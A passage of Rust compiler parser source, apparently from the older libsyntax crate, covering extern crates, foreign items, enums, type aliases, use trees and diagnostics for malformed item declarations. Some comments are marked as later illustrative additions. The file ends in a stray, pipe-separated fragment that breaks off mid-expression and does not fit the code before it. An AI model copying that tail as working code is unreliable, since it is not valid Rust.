let ident = self.parse_ident()?;
let hi = self.span;
self.expect(&token::Semi)?;
Ok(ast::ForeignItem {
ident: ident,
attrs: attrs,
node: ForeignItemKind::Ty,
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
vis: vis
})
}
fn parse_crate_name_with_dashes(&mut self) -> PResult<'a, ast::Ident> {
let error_msg = "crate name using dashes are not valid in `extern crate` statements";
let suggestion_msg = "if the original crate name uses dashes you need to use underscores \
in the code";
let mut ident = if self.token.is_keyword(kw::SelfLower) {
self.parse_path_segment_ident()
} else {
self.parse_ident()
}?;
let mut idents = vec![];
let mut replacement = vec![];
let mut fixed_crate_name = false;
// Accept `extern crate name-like-this` for better diagnostics
let dash = token::Token::BinOp(token::BinOpToken::Minus);
if self.token == dash { // Do not include `-` as part of the expected tokens list
while self.eat(&dash) {
fixed_crate_name = true;
replacement.push((self.prev_span, "_".to_string()));
idents.push(self.parse_ident()?);
}
}
if fixed_crate_name {
let fixed_name_sp = ident.span.to(idents.last().unwrap().span);
let mut fixed_name = format!("{}", ident.name);
for part in idents {
fixed_name.push_str(&format!("_{}", part.name));
}
ident = Ident::from_str(&fixed_name).with_span_pos(fixed_name_sp);
let mut err = self.struct_span_err(fixed_name_sp, error_msg);
err.span_label(fixed_name_sp, "dash-separated idents are not valid");
err.multipart_suggestion(
suggestion_msg,
replacement,
Applicability::MachineApplicable,
);
err.emit();
}
Ok(ident)
}
/// Parses `extern crate` links.
///
/// # Examples
///
/// ```
/// extern crate foo;
/// extern crate bar as foo;
/// ```
fn parse_item_extern_crate(&mut self,
lo: Span,
visibility: Visibility,
attrs: Vec<Attribute>)
-> PResult<'a, P<Item>> {
// Accept `extern crate name-like-this` for better diagnostics
let orig_name = self.parse_crate_name_with_dashes()?;
let (item_name, orig_name) = if let Some(rename) = self.parse_rename()? {
(rename, Some(orig_name.name))
} else {
(orig_name, None)
};
self.expect(&token::Semi)?;
let span = lo.to(self.prev_span);
Ok(self.mk_item(span, item_name, ItemKind::ExternCrate(orig_name), visibility, attrs))
}
/// Parses `extern` for foreign ABI modules.
///
/// `extern` is expected to have been
/// consumed before calling this method.
///
/// # Examples
///
/// ```ignore (only-for-syntax-highlight)
/// extern "C" {}
/// extern {}
/// ```
fn parse_item_foreign_mod(&mut self,
lo: Span,
opt_abi: Option<Abi>,
visibility: Visibility,
mut attrs: Vec<Attribute>)
-> PResult<'a, P<Item>> {
self.expect(&token::OpenDelim(token::Brace))?;
let abi = opt_abi.unwrap_or(Abi::C);
attrs.extend(self.parse_inner_attributes()?);
let mut foreign_items = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
foreign_items.push(self.parse_foreign_item()?);
}
let prev_span = self.prev_span;
let m = ast::ForeignMod {
abi,
items: foreign_items
};
let invalid = Ident::invalid();
Ok(self.mk_item(lo.to(prev_span), invalid, ItemKind::ForeignMod(m), visibility, attrs))
}
/// Parses `type Foo = Bar;` or
/// `existential type Foo: Bar;` or
/// returns `None` without modifying the parser state.
fn eat_type(&mut self) -> Option<PResult<'a, (Ident, AliasKind, ast::Generics)>> {
// This parses the grammar:
// Ident ["<"...">"] ["where" ...] ("=" | ":") Ty ";"
if self.check_keyword(kw::Type) ||
self.check_keyword(kw::Existential) &&
self.is_keyword_ahead(1, &[kw::Type]) {
let existential = self.eat_keyword(kw::Existential);
assert!(self.eat_keyword(kw::Type));
Some(self.parse_existential_or_alias(existential))
} else {
None
}
}
/// Parses a type alias or existential type.
fn parse_existential_or_alias(
&mut self,
existential: bool,
) -> PResult<'a, (Ident, AliasKind, ast::Generics)> {
let ident = self.parse_ident()?;
let mut tps = self.parse_generics()?;
tps.where_clause = self.parse_where_clause()?;
let alias = if existential {
self.expect(&token::Colon)?;
let bounds = self.parse_generic_bounds(Some(self.prev_span))?;
AliasKind::Existential(bounds)
} else {
self.expect(&token::Eq)?;
let ty = self.parse_ty()?;
AliasKind::Weak(ty)
};
self.expect(&token::Semi)?;
Ok((ident, alias, tps))
}
/// Parses the part of an enum declaration following the `{`.
fn parse_enum_def(&mut self, _generics: &ast::Generics) -> PResult<'a, EnumDef> {
let mut variants = Vec::new();
let mut any_disr = vec![];
while self.token != token::CloseDelim(token::Brace) {
let variant_attrs = self.parse_outer_attributes()?;
let vlo = self.span;
let struct_def;
let mut disr_expr = None;
self.eat_bad_pub();
let ident = self.parse_ident()?;
if self.check(&token::OpenDelim(token::Brace)) {
// Parse a struct variant.
let (fields, recovered) = self.parse_record_struct_body()?;
struct_def = VariantData::Struct(fields, recovered);
} else if self.check(&token::OpenDelim(token::Paren)) {
struct_def = VariantData::Tuple(
self.parse_tuple_struct_body()?,
ast::DUMMY_NODE_ID,
);
} else if self.eat(&token::Eq) {
disr_expr = Some(AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
});
if let Some(sp) = disr_expr.as_ref().map(|c| c.value.span) {
any_disr.push(sp);
}
struct_def = VariantData::Unit(ast::DUMMY_NODE_ID);
} else {
struct_def = VariantData::Unit(ast::DUMMY_NODE_ID);
}
let vr = ast::Variant_ {
ident,
id: ast::DUMMY_NODE_ID,
attrs: variant_attrs,
data: struct_def,
disr_expr,
};
variants.push(respan(vlo.to(self.prev_span), vr));
if !self.eat(&token::Comma) {
if self.token.is_ident() && !self.token.is_reserved_ident() {
let sp = self.sess.source_map().next_point(self.prev_span);
let mut err = self.struct_span_err(sp, "missing comma");
err.span_suggestion_short(
sp,
"missing comma",
",".to_owned(),
Applicability::MaybeIncorrect,
);
err.emit();
} else {
break;
}
}
}
self.expect(&token::CloseDelim(token::Brace))?;
self.maybe_report_invalid_custom_discriminants(any_disr, &variants);
Ok(ast::EnumDef { variants })
}
/// Parses an enum declaration.
fn parse_item_enum(&mut self) -> PResult<'a, ItemInfo> {
let id = self.parse_ident()?;
let mut generics = self.parse_generics()?;
generics.where_clause = self.parse_where_clause()?;
self.expect(&token::OpenDelim(token::Brace))?;
let enum_definition = self.parse_enum_def(&generics).map_err(|e| {
self.recover_stmt();
self.eat(&token::CloseDelim(token::Brace));
e
})?;
Ok((id, ItemKind::Enum(enum_definition, generics), None))
}
/// Parses a string as an ABI spec on an extern type or module. The `extern`
/// keyword is expected to have been consumed by the caller.
fn parse_opt_abi(&mut self) -> PResult<'a, Option<Abi>> {
match self.token {
token::Literal(token::Lit { kind: token::Str, symbol, suffix }) |
token::Literal(token::Lit { kind: token::StrRaw(..), symbol, suffix }) => {
let sp = self.span;
self.expect_no_suffix(sp, "an ABI spec", suffix);
self.bump();
match abi::lookup(&symbol.as_str()) {
Some(abi) => Ok(Some(abi)),
None => {
let prev_span = self.prev_span;
let mut err = struct_span_err!(
self.sess.span_diagnostic,
prev_span,
E0703,
"invalid ABI: found `{}`",
symbol);
err.span_label(prev_span, "invalid ABI");
err.help(&format!("valid ABIs: {}", abi::all_names().join(", ")));
err.emit();
Ok(None)
}
}
}
_ => Ok(None),
}
}
fn is_static_global(&mut self) -> bool {
if self.check_keyword(kw::Static) {
// Check if this could be a closure
!self.look_ahead(1, |token| {
if token.is_keyword(kw::Move) {
return true;
}
match *token {
token::BinOp(token::Or) | token::OrOr => true,
_ => false,
}
})
} else {
false
}
}
fn parse_item_(
&mut self,
attrs: Vec<Attribute>,
macros_allowed: bool,
attributes_allowed: bool,
) -> PResult<'a, Option<P<Item>>> {
let mut unclosed_delims = vec![];
let (ret, tokens) = self.collect_tokens(|this| {
let item = this.parse_item_implementation(attrs, macros_allowed, attributes_allowed);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// Once we've parsed an item and recorded the tokens we got while
// parsing we may want to store `tokens` into the item we're about to
// return. Note, though, that we specifically didn't capture tokens
// related to outer attributes. The `tokens` field here may later be
// used with procedural macros to convert this item back into a token
// stream, but during expansion we may be removing attributes as we go
// along.
//
// If we've got inner attributes then the `tokens` we've got above holds
// these inner attributes. If an inner attribute is expanded we won't
// actually remove it from the token stream, so we'll just keep yielding
// it (bad!). To work around this case for now we just avoid recording
// `tokens` if we detect any inner attributes. This should help keep
// expansion correct, but we should fix this bug one day!
Ok(ret.map(|item| {
item.map(|mut i| {
if !i.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
i.tokens = Some(tokens);
}
i
})
}))
}
/// Parses one of the items allowed by the flags.
fn parse_item_implementation(
&mut self,
attrs: Vec<Attribute>,
macros_allowed: bool,
attributes_allowed: bool,
) -> PResult<'a, Option<P<Item>>> {
maybe_whole!(self, NtItem, |item| {
let mut item = item.into_inner();
let mut attrs = attrs;
mem::swap(&mut item.attrs, &mut attrs);
item.attrs.extend(attrs);
Some(P(item))
});
let lo = self.span;
let visibility = self.parse_visibility(false)?;
if self.eat_keyword(kw::Use) {
// USE ITEM
let item_ = ItemKind::Use(P(self.parse_use_tree()?));
self.expect(&token::Semi)?;
let span = lo.to(self.prev_span);
let item =
self.mk_item(span, Ident::invalid(), item_, visibility, attrs);
return Ok(Some(item));
}
if self.eat_keyword(kw::Extern) {
if self.eat_keyword(kw::Crate) {
return Ok(Some(self.parse_item_extern_crate(lo, visibility, attrs)?));
}
let opt_abi = self.parse_opt_abi()?;
if self.eat_keyword(kw::Fn) {
// EXTERN FUNCTION ITEM
let fn_span = self.prev_span;
let abi = opt_abi.unwrap_or(Abi::C);
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Normal,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
abi)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
} else if self.check(&token::OpenDelim(token::Brace)) {
return Ok(Some(self.parse_item_foreign_mod(lo, opt_abi, visibility, attrs)?));
}
self.unexpected()?;
}
if self.is_static_global() {
self.bump();
// STATIC ITEM
let m = if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else {
Mutability::Immutable
};
let (ident, item_, extra_attrs) = self.parse_item_const(Some(m))?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Const) {
let const_span = self.prev_span;
if self.check_keyword(kw::Fn)
|| (self.check_keyword(kw::Unsafe)
&& self.is_keyword_ahead(1, &[kw::Fn])) {
// CONST FUNCTION ITEM
let unsafety = self.parse_unsafety();
self.bump();
let (ident, item_, extra_attrs) =
self.parse_item_fn(unsafety,
respan(const_span, IsAsync::NotAsync),
respan(const_span, Constness::Const),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
// CONST ITEM
if self.eat_keyword(kw::Mut) {
let prev_span = self.prev_span;
let mut err = self.diagnostic()
.struct_span_err(prev_span, "const globals cannot be mutable");
err.span_label(prev_span, "cannot be mutable");
err.span_suggestion(
const_span,
"you might want to declare a static instead",
"static".to_owned(),
Applicability::MaybeIncorrect,
);
err.emit();
}
let (ident, item_, extra_attrs) = self.parse_item_const(None)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
// Parse `async unsafe? fn`.
if self.check_keyword(kw::Async) {
let async_span = self.span;
if self.is_keyword_ahead(1, &[kw::Fn])
|| self.is_keyword_ahead(2, &[kw::Fn])
{
// ASYNC FUNCTION ITEM
self.bump(); // `async`
let unsafety = self.parse_unsafety(); // `unsafe`?
self.expect_keyword(kw::Fn)?; // `fn`
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(unsafety,
respan(async_span, IsAsync::Async {
closure_id: ast::DUMMY_NODE_ID,
return_impl_trait_id: ast::DUMMY_NODE_ID,
}),
respan(fn_span, Constness::NotConst),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
if self.span.rust_2015() {
self.diagnostic().struct_span_err_with_code(
async_span,
"`async fn` is not permitted in the 2015 edition",
DiagnosticId::Error("E0670".into())
).emit();
}
return Ok(Some(item));
}
}
if self.check_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Trait, kw::Auto])
{
// UNSAFE TRAIT ITEM
self.bump(); // `unsafe`
let is_auto = if self.eat_keyword(kw::Trait) {
IsAuto::No
} else {
self.expect_keyword(kw::Auto)?;
self.expect_keyword(kw::Trait)?;
IsAuto::Yes
};
let (ident, item_, extra_attrs) =
self.parse_item_trait(is_auto, Unsafety::Unsafe)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Impl) ||
self.check_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Impl]) ||
self.check_keyword(kw::Default) &&
self.is_keyword_ahead(1, &[kw::Impl, kw::Unsafe]) {
// IMPL ITEM
let defaultness = self.parse_defaultness();
let unsafety = self.parse_unsafety();
self.expect_keyword(kw::Impl)?;
let (ident, item, extra_attrs) = self.parse_item_impl(unsafety, defaultness)?;
let span = lo.to(self.prev_span);
return Ok(Some(self.mk_item(span, ident, item, visibility,
maybe_append(attrs, extra_attrs))));
}
if self.check_keyword(kw::Fn) {
// FUNCTION ITEM
self.bump();
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Normal,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
Abi::Rust)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Unsafe)
&& self.look_ahead(1, |t| *t != token::OpenDelim(token::Brace)) {
// UNSAFE FUNCTION ITEM
self.bump(); // `unsafe`
// `{` is also expected after `unsafe`; in case of error, include it in the diagnostic.
self.check(&token::OpenDelim(token::Brace));
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
self.expect_keyword(kw::Fn)?;
let fn_span = self.prev_span;
let (ident, item_, extra_attrs) =
self.parse_item_fn(Unsafety::Unsafe,
respan(fn_span, IsAsync::NotAsync),
respan(fn_span, Constness::NotConst),
abi)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Mod) {
// MODULE ITEM
let (ident, item_, extra_attrs) =
self.parse_item_mod(&attrs[..])?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if let Some(type_) = self.eat_type() {
let (ident, alias, generics) = type_?;
// TYPE ITEM
let item_ = match alias {
AliasKind::Weak(ty) => ItemKind::Ty(ty, generics),
AliasKind::Existential(bounds) => ItemKind::Existential(bounds, generics),
};
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
attrs);
return Ok(Some(item));
}
if self.eat_keyword(kw::Enum) {
// ENUM ITEM
let (ident, item_, extra_attrs) = self.parse_item_enum()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.check_keyword(kw::Trait)
|| (self.check_keyword(kw::Auto)
&& self.is_keyword_ahead(1, &[kw::Trait]))
{
let is_auto = if self.eat_keyword(kw::Trait) {
IsAuto::No
} else {
self.expect_keyword(kw::Auto)?;
self.expect_keyword(kw::Trait)?;
IsAuto::Yes
};
// TRAIT ITEM
let (ident, item_, extra_attrs) =
self.parse_item_trait(is_auto, Unsafety::Normal)?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.eat_keyword(kw::Struct) {
// STRUCT ITEM
let (ident, item_, extra_attrs) = self.parse_item_struct()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if self.is_union_item() {
// UNION ITEM
self.bump();
let (ident, item_, extra_attrs) = self.parse_item_union()?;
let prev_span = self.prev_span;
let item = self.mk_item(lo.to(prev_span),
ident,
item_,
visibility,
maybe_append(attrs, extra_attrs));
return Ok(Some(item));
}
if let Some(macro_def) = self.eat_macro_def(&attrs, &visibility, lo)? {
return Ok(Some(macro_def));
}
// Verify whether we have encountered a struct or method definition where the user forgot to
// add the `struct` or `fn` keyword after writing `pub`: `pub S {}`
if visibility.node.is_pub() &&
self.check_ident() &&
self.look_ahead(1, |t| *t != token::Not)
{
// Space between `pub` keyword and the identifier
//
// pub S {}
// ^^^ `sp` points here
let sp = self.prev_span.between(self.span);
let full_sp = self.prev_span.to(self.span);
let ident_sp = self.span;
if self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace)) {
// possible public struct definition where `struct` was forgotten
let ident = self.parse_ident().unwrap();
let msg = format!("add `struct` here to parse `{}` as a public struct",
ident);
let mut err = self.diagnostic()
.struct_span_err(sp, "missing `struct` for struct definition");
err.span_suggestion_short(
sp, &msg, " struct ".into(), Applicability::MaybeIncorrect // speculative
);
return Err(err);
} else if self.look_ahead(1, |t| *t == token::OpenDelim(token::Paren)) {
let ident = self.parse_ident().unwrap();
self.bump(); // `(`
let kw_name = if let Ok(Some(_)) = self.parse_self_arg() {
"method"
} else {
"function"
};
self.consume_block(token::Paren);
let (kw, kw_name, ambiguous) = if self.check(&token::RArrow) {
self.eat_to_tokens(&[&token::OpenDelim(token::Brace)]);
self.bump(); // `{`
("fn", kw_name, false)
} else if self.check(&token::OpenDelim(token::Brace)) {
self.bump(); // `{`
("fn", kw_name, false)
} else if self.check(&token::Colon) {
let kw = "struct";
(kw, kw, false)
} else {
("fn` or `struct", "function or struct", true)
};
let msg = format!("missing `{}` for {} definition", kw, kw_name);
let mut err = self.diagnostic().struct_span_err(sp, &msg);
if !ambiguous {
self.consume_block(token::Brace);
let suggestion = format!("add `{}` here to parse `{}` as a public {}",
kw,
ident,
kw_name);
err.span_suggestion_short(
sp, &suggestion, format!(" {} ", kw), Applicability::MachineApplicable
);
} else {
if let Ok(snippet) = self.sess.source_map().span_to_snippet(ident_sp) {
err.span_suggestion(
full_sp,
"if you meant to call a macro, try",
format!("{}!", snippet),
// this is the `ambiguous` conditional branch
Applicability::MaybeIncorrect
);
} else {
err.help("if you meant to call a macro, remove the `pub` \
and add a trailing `!` after the identifier");
}
}
return Err(err);
} else if self.look_ahead(1, |t| *t == token::Lt) {
let ident = self.parse_ident().unwrap();
self.eat_to_tokens(&[&token::Gt]);
self.bump(); // `>`
let (kw, kw_name, ambiguous) = if self.eat(&token::OpenDelim(token::Paren)) {
if let Ok(Some(_)) = self.parse_self_arg() {
("fn", "method", false)
} else {
("fn", "function", false)
}
} else if self.check(&token::OpenDelim(token::Brace)) {
("struct", "struct", false)
} else {
("fn` or `struct", "function or struct", true)
};
let msg = format!("missing `{}` for {} definition", kw, kw_name);
let mut err = self.diagnostic().struct_span_err(sp, &msg);
if !ambiguous {
err.span_suggestion_short(
sp,
&format!("add `{}` here to parse `{}` as a public {}", kw, ident, kw_name),
format!(" {} ", kw),
Applicability::MachineApplicable,
);
}
return Err(err);
}
}
self.parse_macro_use_or_failure(attrs, macros_allowed, attributes_allowed, lo, visibility)
}
/// Parses a foreign item.
crate fn parse_foreign_item(&mut self) -> PResult<'a, ForeignItem> {
maybe_whole!(self, NtForeignItem, |ni| ni);
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let visibility = self.parse_visibility(false)?;
// FOREIGN STATIC ITEM
// Treat `const` as `static` for error recovery, but don't add it to expected tokens.
if self.check_keyword(kw::Static) || self.token.is_keyword(kw::Const) {
if self.token.is_keyword(kw::Const) {
self.diagnostic()
.struct_span_err(self.span, "extern items cannot be `const`")
.span_suggestion(
self.span,
"try using a static value",
"static".to_owned(),
Applicability::MachineApplicable
).emit();
}
self.bump(); // `static` or `const`
return Ok(self.parse_item_foreign_static(visibility, lo, attrs)?);
}
// FOREIGN FUNCTION ITEM
if self.check_keyword(kw::Fn) {
return Ok(self.parse_item_foreign_fn(visibility, lo, attrs)?);
}
// FOREIGN TYPE ITEM
if self.check_keyword(kw::Type) {
return Ok(self.parse_item_foreign_type(visibility, lo, attrs)?);
}
match self.parse_assoc_macro_invoc("extern", Some(&visibility), &mut false)? {
Some(mac) => {
Ok(
ForeignItem {
ident: Ident::invalid(),
span: lo.to(self.prev_span),
id: ast::DUMMY_NODE_ID,
attrs,
vis: visibility,
node: ForeignItemKind::Macro(mac),
}
)
}
None => {
if !attrs.is_empty() {
self.expected_item_err(&attrs)?;
}
self.unexpected()
}
}
}
/// This is the fall-through for parsing items.
fn parse_macro_use_or_failure(
&mut self,
attrs: Vec<Attribute> ,
macros_allowed: bool,
attributes_allowed: bool,
lo: Span,
visibility: Visibility
) -> PResult<'a, Option<P<Item>>> {
if macros_allowed && self.token.is_path_start() &&
!(self.is_async_fn() && self.span.rust_2015()) {
// MACRO INVOCATION ITEM
let prev_span = self.prev_span;
self.complain_if_pub_macro(&visibility.node, prev_span);
let mac_lo = self.span;
// item macro.
let pth = self.parse_path(PathStyle::Mod)?;
self.expect(&token::Not)?;
// a 'special' identifier (like what `macro_rules!` uses)
// is optional. We should eventually unify invoc syntax
// and remove this.
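// For example (illustrative): in `macro_rules! vec { ... }`, the special
// identifier is `vec`.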
let id = if self.token.is_ident() {
self.parse_ident()?
} else {
Ident::invalid() // no special identifier
};
// eat a matched-delimiter token tree:
let (delim, tts) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
let hi = self.prev_span;
let mac = respan(mac_lo.to(hi), Mac_ { path: pth, tts, delim });
let item = self.mk_item(lo.to(hi), id, ItemKind::Mac(mac), visibility, attrs);
return Ok(Some(item));
}
// FAILURE TO PARSE ITEM
match visibility.node {
VisibilityKind::Inherited => {}
_ => {
return Err(self.span_fatal(self.prev_span, "unmatched visibility `pub`"));
}
}
if !attributes_allowed && !attrs.is_empty() {
self.expected_item_err(&attrs)?;
}
Ok(None)
}
/// Parses a macro invocation inside a `trait`, `impl` or `extern` block.
fn parse_assoc_macro_invoc(&mut self, item_kind: &str, vis: Option<&Visibility>,
at_end: &mut bool) -> PResult<'a, Option<Mac>>
{
if self.token.is_path_start() &&
!(self.is_async_fn() && self.span.rust_2015()) {
let prev_span = self.prev_span;
let lo = self.span;
let pth = self.parse_path(PathStyle::Mod)?;
if pth.segments.len() == 1 {
if !self.eat(&token::Not) {
return Err(self.missing_assoc_item_kind_err(item_kind, prev_span));
}
} else {
self.expect(&token::Not)?;
}
if let Some(vis) = vis {
self.complain_if_pub_macro(&vis.node, prev_span);
}
*at_end = true;
// eat a matched-delimiter token tree:
let (delim, tts) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace {
self.expect(&token::Semi)?;
}
Ok(Some(respan(lo.to(self.prev_span), Mac_ { path: pth, tts, delim })))
} else {
Ok(None)
}
}
fn collect_tokens<F, R>(&mut self, f: F) -> PResult<'a, (R, TokenStream)>
where F: FnOnce(&mut Self) -> PResult<'a, R>
{
// Record all tokens we parse when parsing this item.
let mut tokens = Vec::new();
let prev_collecting = match self.token_cursor.frame.last_token {
LastToken::Collecting(ref mut list) => {
Some(mem::replace(list, Vec::new()))
}
LastToken::Was(ref mut last) => {
tokens.extend(last.take());
None
}
};
self.token_cursor.frame.last_token = LastToken::Collecting(tokens);
let prev = self.token_cursor.stack.len();
let ret = f(self);
let last_token = if self.token_cursor.stack.len() == prev {
&mut self.token_cursor.frame.last_token
} else {
&mut self.token_cursor.stack[prev].last_token
};
// Pull out the tokens that we've collected from the call to `f` above.
let mut collected_tokens = match *last_token {
LastToken::Collecting(ref mut v) => mem::replace(v, Vec::new()),
LastToken::Was(_) => panic!("our vector went away?"),
};
// If we're not at EOF our current token wasn't actually consumed by
// `f`, but it'll still be in our list that we pulled out. In that case
// put it back.
let extra_token = if self.token != token::Eof {
collected_tokens.pop()
} else {
None
};
// If we were previously collecting tokens, then this was a recursive
// call. In that case we need to record all the tokens we collected in
// our parent list as well. To do that we push a clone of our stream
// onto the previous list.
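// Illustrative example (not from the original source): when parsing
// `mod m { fn f() {} }`, the tokens of `fn f() {}` are collected by a nested
// call, and this branch appends them to the enclosing module's list as well.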
match prev_collecting {
Some(mut list) => {
list.extend(collected_tokens.iter().cloned());
list.extend(extra_token);
*last_token = LastToken::Collecting(list);
}
None => {
*last_token = LastToken::Was(extra_token);
}
}
Ok((ret?, TokenStream::new(collected_tokens)))
}
pub fn parse_item(&mut self) -> PResult<'a, Option<P<Item>>> {
let attrs = self.parse_outer_attributes()?;
self.parse_item_(attrs, true, false)
}
/// `::{` or `::*`
fn is_import_coupler(&mut self) -> bool {
self.check(&token::ModSep) &&
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace) ||
*t == token::BinOp(token::Star))
}
/// Parses a `UseTree`.
///
/// ```
/// USE_TREE = [`::`] `*` |
/// [`::`] `{` USE_TREE_LIST `}` |
/// PATH `::` `*` |
/// PATH `::` `{` USE_TREE_LIST `}` |
/// PATH [`as` IDENT]
/// ```
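///
/// For example (illustrative, not from the original source), `use a::b::{c, d as e};`
/// parses with prefix `a::b` and a nested list containing `c` and `d as e`.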
fn parse_use_tree(&mut self) -> PResult<'a, UseTree> {
let lo = self.span;
let mut prefix = ast::Path { segments: Vec::new(), span: lo.shrink_to_lo() };
let kind = if self.check(&token::OpenDelim(token::Brace)) ||
self.check(&token::BinOp(token::Star)) ||
self.is_import_coupler() {
// `use *;` or `use ::*;` or `use {...};` or `use ::{...};`
let mod_sep_ctxt = self.span.ctxt();
if self.eat(&token::ModSep) {
prefix.segments.push(
PathSegment::path_root(lo.shrink_to_lo().with_ctxt(mod_sep_ctxt))
);
}
if self.eat(&token::BinOp(token::Star)) {
UseTreeKind::Glob
} else {
UseTreeKind::Nested(self.parse_use_tree_list()?)
}
} else {
// `use path::*;` or `use path::{...};` or `use path;` or `use path as bar;`
prefix = self.parse_path(PathStyle::Mod)?;
if self.eat(&token::ModSep) {
if self.eat(&token::BinOp(token::Star)) {
UseTreeKind::Glob
} else {
UseTreeKind::Nested(self.parse_use_tree_list()?)
}
} else {
UseTreeKind::Simple(self.parse_rename()?, ast::DUMMY_NODE_ID, ast::DUMMY_NODE_ID)
}
};
Ok(UseTree { prefix, kind, span: lo.to(self.prev_span) })
}
/// Parses a `UseTreeKind::Nested(list)`.
///
/// ```
/// USE_TREE_LIST = Ø | (USE_TREE `,`)* USE_TREE [`,`]
/// ```
fn parse_use_tree_list(&mut self) -> PResult<'a, Vec<(UseTree, ast::NodeId)>> {
self.parse_unspanned_seq(&token::OpenDelim(token::Brace),
&token::CloseDelim(token::Brace),
SeqSep::trailing_allowed(token::Comma), |this| {
Ok((this.parse_use_tree()?, ast::DUMMY_NODE_ID))
})
}
fn parse_rename(&mut self) -> PResult<'a, Option<Ident>> {
if self.eat_keyword(kw::As) {
self.parse_ident_or_underscore().map(Some)
} else {
Ok(None)
}
}
/// Parses a source module as a crate. This is the main entry point for the parser.
pub fn parse_crate_mod(&mut self) -> PResult<'a, Crate> {
let lo = self.span;
let krate = Ok(ast::Crate {
attrs: self.parse_inner_attributes()?,
module: self.parse_mod_items(&token::Eof, lo)?,
span: lo.to(self.span),
});
krate
}
pub fn parse_optional_str(&mut self) -> Option<(Symbol, ast::StrStyle, Option<ast::Name>)> {
let ret = match self.token {
token::Literal(token::Lit { kind: token::Str, symbol, suffix }) =>
(symbol, ast::StrStyle::Cooked, suffix),
token::Literal(token::Lit { kind: token::StrRaw(n), symbol, suffix }) =>
(symbol, ast::StrStyle::Raw(n), suffix),
_ => return None
};
self.bump();
Some(ret)
}
pub fn parse_str(&mut self) -> PResult<'a, (Symbol, StrStyle)> {
match self.parse_optional_str() {
Some((s, style, suf)) => {
let sp = self.prev_span;
self.expect_no_suffix(sp, "a string literal", suf);
Ok((s, style))
}
_ => {
let msg = "expected string literal";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
Err(err)
}
}
}
fn report_invalid_macro_expansion_item(&self) {
self.struct_span_err(
self.prev_span,
"macros that expand to items must be delimited with braces or followed by a semicolon",
).multipart_suggestion(
"change the delimiters to curly braces",
vec![
(self.prev_span.with_hi(self.prev_span.lo() + BytePos(1)), String::from(" {")),
(self.prev_span.with_lo(self.prev_span.hi() - BytePos(1)), '}'.to_string()),
],
Applicability::MaybeIncorrect,
).span_suggestion(
self.sess.source_map().next_point(self.prev_span),
"add a semicolon",
';'.to_string(),
Applicability::MaybeIncorrect,
).emit();
}
}
pub fn emit_unclosed_delims(unclosed_delims: &mut Vec<UnmatchedBrace>, handler: &errors::Handler) {
for unmatched in unclosed_delims.iter() {
let mut err = handler.struct_span_err(unmatched.found_span, &format!(
"incorrect close delimiter: `{}`",
pprust::token_to_string(&token::Token::CloseDelim(unmatched.found_delim)),
));
err.span_label(unmatched.found_span, "incorrect close delimiter");
if let Some(sp) = unmatched.candidate_span {
err.span_label(sp, "close delimiter possibly meant for this");
}
if let Some(sp) = unmatched.unclosed_span {
err.span_label(sp, "un-closed delimiter");
}
err.emit();
}
unclosed_delims.clear();
} | while !kets.iter().any(|k| {
match expect {
TokenExpectType::Expect => self.check(k), |
